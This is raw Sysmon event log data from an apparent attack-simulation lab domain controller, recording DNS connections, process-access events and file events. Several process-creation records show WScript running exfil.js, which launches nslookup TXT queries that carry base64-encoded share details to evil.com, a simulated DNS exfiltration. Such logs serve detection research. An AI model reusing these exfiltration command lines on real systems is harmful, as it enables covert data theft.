AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60785-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.785{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50593- 354300x8000000000000000208161Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.784{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50592- 354300x8000000000000000208160Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.783{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50591- 354300x8000000000000000208159Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.217{00000000-0000-0000-0000-000000000000}3504<unknown process>-udpfalsefalse127.0.0.1-50572-false127.0.0.1-53domain 354300x8000000000000000208158Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{00000000-0000-0000-0000-000000000000}3504<unknown process>-udptruefalse127.0.0.1-50572-false127.0.0.1-53domain 354300x8000000000000000208157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{00000000-0000-0000-0000-000000000000}3504<unknown process>-udpfalsefalse127.0.0.1-50571-false127.0.0.1-53domain 354300x8000000000000000208156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{00000000-0000-0000-0000-000000000000}3504<unknown process>-udptruefalse127.0.0.1-50571-false127.0.0.1-53domain 354300x8000000000000000208155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.216{00000000-0000-0000-0000-000000000000}3504<unknown process>-udpfalsefalse127.0.0.1-50570-false127.0.0.1-53domain 354300x8000000000000000208154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.215{00000000-0000-0000-0000-000000000000}3504<unknown process>-udptruefalse127.0.0.1-50570-false127.0.0.1-53domain 354300x8000000000000000208153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.058{00000000-0000-0000-0000-000000000000}3568<unknown process>-udpfalsefalse127.0.0.1-50566-false127.0.0.1-53domain 354300x8000000000000000208152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.058{00000000-0000-0000-0000-000000000000}3568<unknown process>-udptruefalse127.0.0.1-50566-false127.0.0.1-53domain 354300x8000000000000000208151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{00000000-0000-0000-0000-000000000000}3724<unknown process>-udpfalsefalse127.0.0.1-50565-false127.0.0.1-53domain 354300x8000000000000000208150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{00000000-0000-0000-0000-000000000000}3724<unknown process>-udptruefalse127.0.0.1-50565-false127.0.0.1-53domain 354300x8000000000000000208149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{00000000-0000-0000-0000-000000000000}3724<unknown process>-udpfalsefalse127.0.0.1-50564-false127.0.0.1-53domain 354300x8000000000000000208148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{00000000-0000-0000-0000-000000000000}3724<unknown process>-udptruefalse127.0.0.1-50564-false127.0.0.1-53domain 354300x8000000000000000208147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.979{00000000-0000-0000-0000-000000000000}3724<unknown process>-udpfalsefalse127.0.0.1-50563-false127.0.0.1-53domain 354300x8000000000000000208146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.978{00000000-0000-0000-0000-000000000000}3724<unknown process>-udptruefalse127.0.0.1-50563-false127.0.0.1-53domain 10341000x8000000000000000208145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4F43-000000005F02}3588C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4E43-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-18E0-629A-6742-000000005F02}39762036C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-4E43-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.385{2E1864BB-18E9-629A-4E43-000000005F02}6200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlajidam.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.381{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlotjgqg.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.343{2E1864BB-18E9-629A-4C43-000000005F02}17723992C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4D43-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.343{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.343{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4D43-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.343{2E1864BB-18E9-629A-4B43-000000005F02}76727532C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-4D43-000000005F02}5552C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.351{2E1864BB-18E9-629A-4D43-000000005F02}5552C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-4B43-000000005F02}7672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlotjgqg.tmp 2>&1 10341000x8000000000000000208128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.328{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4C43-000000005F02}1772C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.328{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4C43-000000005F02}1772C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.328{2E1864BB-18E9-629A-4C43-000000005F02}17723992C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4B43-000000005F02}7672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000208125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.328{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95E4E1BFD285B936FE61E0FAA6C96A7E,SHA256=BBB7952BE3B0BCCA6B3BFABE15F396E6DA8E2F78CAC4610AA359ECA7361969D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-4C43-000000005F02}1772C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000208123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C49BA6CEF5EA6A3211233919CC924C94,SHA256=CE498F56870146280A6E6D0659C4EE5A4DAEE269A7AEE9531E8D33DE29CAA53C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000208122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6AAE0D82E4280D7D8205EA048DB58FD9,SHA256=396692FF5D75EB01389934ACEA14FA88D360475450351B5AEE018CB23240F91D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.312{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 